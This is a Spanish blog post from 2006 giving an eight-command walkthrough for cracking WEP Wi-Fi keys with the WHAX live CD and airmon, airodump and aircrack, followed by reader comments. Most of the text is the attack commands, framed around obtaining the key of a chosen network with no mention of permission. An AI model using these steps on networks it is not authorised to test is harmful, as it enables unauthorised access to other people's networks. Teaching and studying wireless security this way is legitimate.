Rompiendo el cifrado WEP en 8 comandos

freed0m
3

Visto 15025 veces | Publicado el 15/04/2006 | cifrado wireless wep


Existen múltiples manuales para romper la seguridad de las redes Wireless cuando se utiliza el protocolo WEP, en este caso, ajustamos el entorno a las siguientes condiciones, distribución livecd WHAX, portatil Dell Latitude D610.
Dentro de la distribución tenemos todas las utilidades que vamos a necesitar.

Comenzamos..

Introducimos el cdrom de WHAX.

Indicamos a la BIOS el inicio desde cdrom.

Tecleamos:

  1. linux load=ipw2200 

    De esta forma se cargará el entorno necesario para hacer funcionar la tarjeta wifi.

    ...cuando se nos presenta la pantalla que nos habla de la configuración del entorno gráfico X, y nos indica la password del usuario root, indicamos:

    login:root
    passwd:toor

    y a continuación tecleamos..

  2. startx 

    Una vez iniciado el entorno gráfico, si no carga correctamente las X, habrá que usar xconf, el entorno gráfico no es necesario, así que podríamos evitarnos este segundo paso e ir directamente al tercero.

    Mediante el menú de navegación de WHAX, accedemos a una consola "Xterm" y tecleamos..

  3. airmon.sh start eth0 

  4. airodump eth0 pruebas 0 1 

    (Apuntamos el nombre de la red (ESSID) y el canal (channel) a la que queremos acceder)
  5. iwconfig eth0 mode monitor channel (canal) essid (essid) 

  6. airmon.sh start eth0 (canal) 

  7. airodump eth0 (essid) (canal) 1 

    En este momento comienza la captura de paquetes, cuanto mayor sea el número de IVS mayor la posibilidad de obtener la clave, en nuestro caso con 240.998 IVS se obtuvo en 6 segundos. Las recomendaciones son de 1.000.000 de IVS para una clave WEP de 104 bits.
    Una vez capturado este tráfico...
  8. aircrack (essid).ivs 

    Y en un periodo breve de tiempo... nos mostrará la clave.

Existen diversos métodos para acelerar la captura de tráfico en concreto de los IVS, pero no los explicaremos aquí.

Notas: este procedimiento no está probado en situaciones distintas a las descritas en el documento.

El valor (essid) ha de sustituirse por el nombre de la red wifi cuya clave se quiere obtener.
El valor (canal) se ha de sustituir por el canal de la red donde se quiere capturar el tráfico.

Enlaces relacionados:
iwhax.net
Aircrack

Y ..la Web oficial de aircrack http://www.cr0.net:8040/code/network/ de la que cuenta la leyenda que cuando se produce la alineación de los astros funciona, durante la realización de este artículo nunca se produjo.

RompiendoElCifradoWEPenOchoComandos-HackTimes.com.v.0.1.pdf


febrero 10 9:20 a.m.
freed0m dijo:

Gracias por tu comentario, si consultas la fecha de este artículo 15/04/2006 veras que ya tiene bastante tiempo, por otra parte comentarte que es normal que la información que figura aquí puedas obtenerla en otros sitios. Gracias por seguirnos. Saludos!

febrero 09 9:29 p.m.
RT2561_2 dijo:

BUEN ARTICULO , Pero una sugerencia, esta informacion la vemos en todo lado, seria chevre que en cada paso explicaron como funciona cada comadno y cada procedimiento para tener mas calro que es lo que se esta haciendo y si es posible un ejemplo por ejhm`plo SSId peito, MAC 00:1B:93:5T:00ç: Canal 6 inteisdad de lña señal 37db y explicar que hace cada moando por lo demas muy bien

diciembre 17 4:59 p.m.
peep dijo:

pico


Añadir comentario










captcha


Búsqueda

Síguenos


Otros contenidos

El staff de Hacktimes ruega a cualquier persona interesada en la distribución y/o publicación de estos artículos que lo haga sin alterar su contenido y cite a su autor y/o la fuente original. Muchas gracias.

Todos los artículos publicados se encuentran bajo la licencia Creative Commons